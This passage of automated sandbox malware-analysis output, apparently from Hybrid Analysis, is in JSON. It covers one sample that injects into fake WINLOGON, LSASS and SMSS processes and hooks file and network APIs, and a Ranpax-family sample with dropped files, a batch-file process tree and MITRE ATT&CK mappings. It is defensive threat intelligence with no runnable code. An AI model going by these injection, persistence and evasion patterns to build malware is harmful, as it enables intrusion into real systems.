52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 372)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 372)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 420)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 420)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 420)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 372)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 372)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" allocated memory in \"C:\\afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\"\n \"D3_08.exe\" allocated memory in \"%WINDIR%\\D3_08.exe\"\n \"IExplorer.exe\" allocated memory in \"%WINDIR%\\system32\\IExplorer.exe\"\n \"WINLOGON.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\"\n \"CSRSS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\CSRSS.EXE\"\n \"SERVICES.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\SERVICES.EXE\"\n \"LSASS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\LSASS.EXE\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-33", "type": 9, "relevance": 10, "name": "Creates a fake system process", "description": "Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00004272)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00006072)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00004132)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003964)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003836)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003016)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003628)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00004068)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003096)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00004088)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003756)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00004308)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003916)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00006140)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00006120)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003976)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00002060)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003000)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00001772)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00002272)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00001440)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00000944)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003856)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003640)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00001620)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00002628)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00001312)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00004060)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003672)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003224)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003164)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00002228)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003696)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003188)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003120)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003064)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00004808)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00004216)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00004200)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00001464)", "origin": "Monitored Target", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "hooks-2", "type": 11, "relevance": 10, "name": "Hooks file system APIs", "description": "\"FindFirstFileA@KERNEL32.DLL\" in \"D3_08.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"D3_08.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"D3_08.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"D3_08.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"SMSS.EXE\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "hooks-5", "type": 11, "relevance": 10, "name": "Hooks internet related APIs", "description": "\"send@WS2_32.DLL\" in \"D3_08.exe\"\n \"send@WS2_32.DLL\" in \"CSRSS.EXE\"\n \"send@WS2_32.DLL\" in \"IExplorer.exe\"\n \"send@WS2_32.DLL\" in \"WINLOGON.EXE\"\n \"send@WS2_32.DLL\" in \"LSASS.EXE\"\n \"send@WS2_32.DLL\" in \"SMSS.EXE\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d
https://hybrid-analysis.com/sample/ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d
Hybrid Analysis - Killers
{"size": 53513, "type": "PE32 executable (GUI) Intel 80386, for MS Windows, PECompact2 compressed", "submit_name": "ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d", "sha256": "ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d", "av_detect": 91, "vx_family": "Ranpax.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 4, "total_processes": 3, "total_signatures": 151, "extracted_files": [{"name": "biudfw.exe", "file_path": "%TEMP%\\biudfw.exe", "file_size": 53572, "sha256": "6e089572abd6f8b89f67670fc5660e962e3fa7ee813fbd8de03d21d54fab98db", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, PECompact2 compressed", "runtime_process": "ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe (PID: 5876)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "golfinfo.ini", "file_path": "%TEMP%\\golfinfo.ini", "file_size": 512, "sha256": "c0b7315aed511cab0685b0bbbcfa2cb7f3e9c36e58f6d7f1576fad807800add7", "type_tags": ["text"], "description": "Non-ISO extended-ASCII text, with very long lines (512), with no line terminators", "runtime_process": "biudfw.exe (PID: 6040)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "sanfdr.bat", "file_path": "%TEMP%\\sanfdr.bat", "file_size": 247, "sha256": "5a0bbc353db5a68485bd1d2b31c36789c7144a31ed908053b94a9084e5332982", "type_tags": ["text"], "description": "ASCII text, with CRLF, CR line terminators", "runtime_process": "ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe (PID: 5876)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 11.00 (Visual Studio 2012) (build: 61030)", "1 Unknown Resource Files (build: 0)", "1 .RES Files linked with CVTRES.EXE 11.00 (Visual Studio 2012) (build: 61030)", "5 .CPP Files (with LTCG) compiled with CL.EXE 17.00 (Visual Studio 2012) (build: 61030)"], "imported_objects": ["13 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "120 .C Files compiled with CL.EXE 17.00 (Visual Studio 2012) (build: 50929)", "15 .ASM Files assembled with MASM 11.00 (Visual Studio 2012) (build: 50929)", "39 .CPP Files compiled with CL.EXE 17.00 (Visual Studio 2012) (build: 50929)"], "file_analysis": ["File contains C++ code", "File appears to contain raw COFF/OMF content", "File was optimized using LTCG and/or POGO", "File is the product of a small codebase (5 files)"], "total_file_compositions_imports": 132}, "processes": [{"uid": "00000000-00005876", "name": "ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe", "normalized_path": "C:\\ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe", "sha256": "ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d", "av_label": "Gen:Heur.Ranpax", "av_matched": 17, "av_total": 22}, {"uid": "00000000-00006040", "parentuid": "00000000-00005876", "name": "biudfw.exe", "normalized_path": "%TEMP%\\biudfw.exe", "sha256": "6e089572abd6f8b89f67670fc5660e962e3fa7ee813fbd8de03d21d54fab98db"}, {"uid": "00000000-00003956", "parentuid": "00000000-00005876", "name": "cmd.exe", "normalized_path": "%WINDIR%\\system32\\cmd.exe", "command_line": "/c \"\"%TEMP%\\sanfdr.bat\" \"", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 12}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 2, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 3, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 3, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 11}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 1, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Device Driver Discovery", "attck_id": "T1652", "attck_id_wiki": "https://attack.mitre.org/techniques/T1652", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", 